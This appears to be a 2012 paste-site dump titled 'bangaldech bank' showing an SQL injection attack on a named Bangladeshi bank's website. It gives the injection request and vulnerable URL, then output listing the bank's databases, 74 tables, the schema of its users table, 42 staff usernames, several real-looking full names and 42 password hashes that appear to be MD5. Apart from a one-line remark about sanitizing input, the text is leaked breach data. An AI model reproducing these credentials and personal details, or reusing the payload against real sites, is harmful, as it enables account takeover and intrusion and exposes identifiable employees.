human_mind_cracker

bangaldech bank

Oct 25th, 2012
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.26 KB | None | 0 0
  1. {*]SQL Injection:
  2.  
  3. SQL Injection (SQLI) is a code injection technique that exploits a security vulnerability occurring in the database layer of a web application. The vulnerability was present when user input was either incorrectly filtered for string literal escape characters embedded in SQL statements or user input was not strongly typed and thereby unexpectedly executed.
  4.  
  5. solution: Sanitize all user-supplied data before using it as part of database queries.
  6.  
  7. database: MySQL
  8.  
  9. request:
  10.  
  11. GET http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID='%60%22XrojS HTTP/1.1
  12. database: MySQL
  13.  
  14. [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
  15.  
  16.  
  17.  
  18. available databases [2]:
  19. [*] information_schema
  20. [*] islamidb
  21.  
  22. Database: islamidb
  23. [74 tables]
  24. +--------------------------+
  25. | annualreport |
  26. | ar_cat |
  27. | area |
  28. | articles |
  29. | atm |
  30. | atm_area |
  31. | atm_location |
  32. | audit_committee |
  33. | board_of_directors |
  34. | books |
  35. | branchdtls |
  36. | branches |
  37. | chairman_corner |
  38. | charge_commision |
  39. | corporate_info |
  40. | currencyrate |
  41. | currencyrate0 |
  42. | deposit_scheme |
  43. | deposit_scheme_info |
  44. | dept |
  45. | disclosure |
  46. | district |
  47. | download |
  48. | dynamicsections |
  49. | email |
  50. | eventdetails |
  51. | eventdetails_11 |
  52. | eventdetails_111 |
  53. | events |
  54. | executive_committee |
  55. | feb_aof_info |
  56. | feb_crsp_info |
  57. | feb_csc_info |
  58. | feb_nrb_info |
  59. | feb_rema_info |
  60. | feb_repa_info |
  61. | fex_graph |
  62. | interview |
  63. | investment |
  64. | jobcategory |
  65. | jobdetails |
  66. | keypersonal |
  67. | link |
  68. | link_cat |
  69. | management |
  70. | managementdetails |
  71. | manager_info |
  72. | md_corner |
  73. | md_news |
  74. | md_publication |
  75. | news |
  76. | notice |
  77. | orderby |
  78. | orderplacement |
  79. | paidup_capital |
  80. | personnel |
  81. | photo_album |
  82. | price_sensative_headline |
  83. | privilege |
  84. | profit_rate |
  85. | publication |
  86. | qryjobs |
  87. | rds_perform_details |
  88. | rds_perform_heading |
  89. | shariahcouncil |
  90. | shariahdetails |
  91. | sme_info |
  92. | sme_prd_info |
  93. | sme_zone |
  94. | sponsors |
  95. | sysvalues |
  96. | userrights |
  97. | users |
  98. | video |
  99. +--------------------------+
  100.  
  101. Database: islamidb
  102. Table: users
  103. [13 columns]
  104. +-------------+--------------+
  105. | Column | Type |
  106. +-------------+--------------+
  107. | Address | varchar(50) |
  108. | BranchName | varchar(50) |
  109. | Depertment | varchar(50) |
  110. | Designation | varchar(50) |
  111. | Email | varchar(50) |
  112. | FullName | varchar(50) |
  113. | IsActive | tinyint(4) |
  114. | Mobile | varchar(50) |
  115. | Password | varchar(255) |
  116. | Phone | varchar(50) |
  117. | UserID | int(11) |
  118. | UserName | varchar(50) |
  119. | UserType | char(1) |
  120. +-------------+--------------+
  121.  
  122. Database: islamidb
  123. Table: users
  124. [42 entries]
  125. +------------------+
  126. | UserName |
  127. +------------------+
  128. | atmadmin |
  129. | atmimran |
  130. | bcdadmin |
  131. | bcdraquib |
  132. | borhan |
  133. | bpmdadmin |
  134. | bpmdnizam |
  135. | bpmdsaiful |
  136. | bsadmin |
  137. | bsahashan |
  138. | bsfoysal |
  139. | chairmanadmin |
  140. | chairmanuser |
  141. | dsd |
  142. | ecsdadmin |
  143. | ecsdjahangir |
  144. | fadadmin |
  145. | fadshaheduzzaman |
  146. | hrdabrar |
  147. | hrdadmin |
  148. | hrdahsan |
  149. | hrdmaquddus |
  150. | ibwadmin |
  151. | ibwmonir |
  152. | ictdwebadmin |
  153. | khademibw |
  154. | mdsadmin |
  155. | mdsmohtasim |
  156. | mkamal |
  157. | prdadmin |
  158. | prdhumayan |
  159. | rcidadmin |
  160. | rddadmin |
  161. | rddmashiul |
  162. | rddthohid |
  163. | rdsadmin |
  164. | rdsuser |
  165. | shaheduzzaman |
  166. | shareadmin |
  167. | sharerozaer |
  168. | shariahadmin |
  169. | shariahhabib |
  170. +------------------+
  171.  
  172.  
  173. Database: islamidb
  174. Table: users
  175. [42 entries]
  176. +-------------------------------+
  177. | FullName |
  178. +-------------------------------+
  179. | Admin of HRD |
  180. | Ahsan Habib |
  181. | Habibur Rahman |
  182. | Humayan Rashid |
  183. | Imran |
  184. | Ismail |
  185. | Jahangir Hossain |
  186. | Md. Atiqur Rahman khan Khadem |
  187. | Md. Borhan Uddin |
  188. | Md. Mashiul Alam |
  189. | Md. Mostofa Kamal |
  190. | Mohammd Thohidul Islam |
  191. | Muhammad Abdul Quddus |
  192. | Omar Foysal |
  193. | Qazi Mohammed Shamsul Abrar |
  194. | Rozaer Hossain |
  195. | S M Abdur Raquib |
  196. | Saiful Islam |
  197. | Shaheduzzaman |
  198. | Super Admin |
  199. |_______________________________
  200.  
  201.  
  202. Database: islamidb
  203. Table: users
  204. [42 entries]
  205. +----------------------------------+
  206. | Password |
  207. +----------------------------------+
  208. | 01e8565004e20ebaaee5d1e948cc0f03 |
  209. | 04dcef1b1d1ffff2a2c1f6f31e42348a |
  210. | 0d308e5cfbb51143225b884c2d56167e |
  211. | 0ed377bde3c3a6a3b3c9b8f49c81bcac |
  212. | 119cbed0296edd3415f73ca21d695eb4 |
  213. | 13cf6dd79b3e7d7d398f11a567a0a1b5 |
  214. | 178b0c400e3cbc03418ee64e7af71b6e |
  215. | 2651cea9b74c51aacdbcc1396ce5bfb7 |
  216. | 3d3993a6ece38d0c10b155d5facf78e7 |
  217. | 3eeb8d98c5dba5919eaed3f93bc317e6 |
  218. | 3fb85c9f03577600bc8ba6e2e25a44d5 |
  219. | 46f1eeae56bdf1077e1890cf8c8384a3 |
  220. | 48cda072801bb304a08aaa19cae8ece6 |
  221. | 4c1f0b5771136bf504f8d72144fc0972 |
  222. | 5135cebb53ab8a028f9d16d48ca9f5f5 |
  223. | 6013ee7dc437d4b10b211110ebeb5dc4 |
  224. | 639aa761eb8cdaaf132c98460c3a92be |
  225. | 641e4550176313cfcb7004dc6657c54c |
  226. | 731c4cece807f681524eeb3c00c075c8 |
  227. | 738a639acd1502c515d2ba9a980162e8 |
  228. | 7e242f8c51fdb0b1a754bcdec21d0532 |
  229. | 806938e17a140d0a2847c6d4a7e88e8c |
  230. | 8336f298fed5901d2c58c4c3a0be0522 |
  231. | 86d7ffa824672126bd183a8961d95a1e |
  232. | 8e099fb1fd7804e63e29ca180853f1a3 |
  233. | 9e044b89f318c8848d18ad0f8a64d309 |
  234. | 9f6b071e1e1c75a380a99972fd1d6c87 |
  235. | a06ea6415499e6fc813cdb756da9fdb6 |
  236. | b31d1d300bd4d9438a59169c08535682 |
  237. | bd06b23acb9d8f84149500333cc1c7cc |
  238. | bd596577eefdf3a60b314512035d7de8 |
  239. | bed407e0a32fdd46b71722c11991d9c3 |
  240. | cca35a0265721f5ab431821a745056af |
  241. | d6dec0fde9d68bb607d25b84d45059f0 |
  242. | da1f2fbf9b96c7160869c785b8de4bd6 |
  243. | da7c5f47b4c492545aa55ec5887989a1 |
  244. | db502e13cc0ad9b22440223c095bcdaf |
  245. | e2e796c8d2f15e6eeae1498e063996d1 |
  246. | ecdc03a40c52f1a387cb44ddf5740e5d |
  247. | f099cd5a70853ec7de964fdbb7027bb9 |
  248. | f28d90f403abe8c509aca6bd73930e8f |
  249. | f3c94f7cece18ac86ede31265f24a2e7 |
  250. +----------------------------------+
Add Comment
Please, Sign In to add comment